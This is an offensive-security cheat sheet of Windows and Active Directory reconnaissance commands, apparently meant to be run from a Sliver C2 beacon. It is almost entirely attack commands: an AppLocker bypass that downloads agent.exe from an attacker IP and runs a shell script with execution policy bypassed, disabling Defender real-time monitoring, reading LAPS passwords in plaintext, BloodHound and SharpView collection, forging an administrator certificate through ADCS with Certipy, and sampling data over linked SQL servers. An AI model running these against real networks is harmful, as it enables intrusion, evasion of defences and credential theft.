Skip to main content

Recon

Windows recon

Some commands are meant to be executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes.

Applocker

Applocker policies

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
  • Powershell language mode
$ExecutionContext.SessionState.LanguageMode

Test AppLocker Policy

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
$PSVersionTable
$ExecutionContext.SessionState.LanguageMode
powershell -version 2 -c '$ExecutionContext.SessionState.LanguageMode'

Bypass Applocker

PSByPassCLM

ired.team article

Invoke-WebRequest -Uri http://10.10.10.x/agent.exe -OutFile agent.exe
powershell -version 2 -nop -nop -noexit -exec bypass -c '.\shell.ps1'

System Info

  • Tasklist
tasklist /svc
ps
  • Logged-In Users
query user
qwinsta /server:127.0.0.1
  • Windows Defender
Get-MpComputerStatus
# or
sc query windefend

BONUS: Disable Defender

Set-MpPreference -DisableRealtimeMonitoring $true
  • Applocker policies
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
  • Powershell language mode
$ExecutionContext.SessionState.LanguageMode
  • LAPS
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
Get-LAPSComputers

BONUS: Read LAPS password (if possible)

Get-LapsADPassword -Identity COM -AsPlainText
  • Go-to Sharphound command
sharp-hound-4 -i -s -t 100 -- -c All
  • Get list of domain users
sharpview -t 1000 -- Get-DomainUser -Domain eu.junon.vl -Properties samaccountname
  • Simple privesc check
sharpup audit
  • Check if a proxy is enabled (Powershell)
[System.Net.WebProxy]::GetDefaultProxy()
  • Get named pipes
get-childitem \\.\pipe\
[System.IO.Directory]::GetFiles("\\.\\pipe\\")
(get-childitem \\.\pipe\).FullName
  • Certipy ADCS enumeration, request and authentication
certipy find -username username@domain.com -password password -vulnerable -stdout
# or
certipy find -username username@domain.com -password password -vulnerable --old-bloodhound
certipy req -u 'usename@domain.com' -p 'password' -dc-ip 10.10.10.10 -ca 'name-DC-CA' -template 'templateName' -upn 'administrator@domain.com' -target 'DC.domain.com' -key-size 4096
certipy auth -pfx administrator.pfx -dc-ip '10.10.10.10' -username 'administrator' -domain domain.com
  • Seatbelt (useful commands)
execute-assembly -i -E seatbelt.exe -group=system
execute-assembly -i -E seatbelt.exe InternetSettings
  • Windows Services
sc query
Get-Service | fl
  • Domain trusts
# powerview
Get-DomainTrust -Domain domain.com

Get-ADTrust -Filter *
nltest /domain_trusts
  • Enumerate domain shares
Find-DomainShare -ComputerDomain domain.com -CheckShareAccess
  • Enumerate databases
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "KEYWORD" -SampleSize 5 | select instance, database, column, sample | ft -autosize
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select * from information_schema.tables')"
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select column_name from master.information_schema.columns')"
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select top 5 OrgNumber from master.dbo.VIPClients')"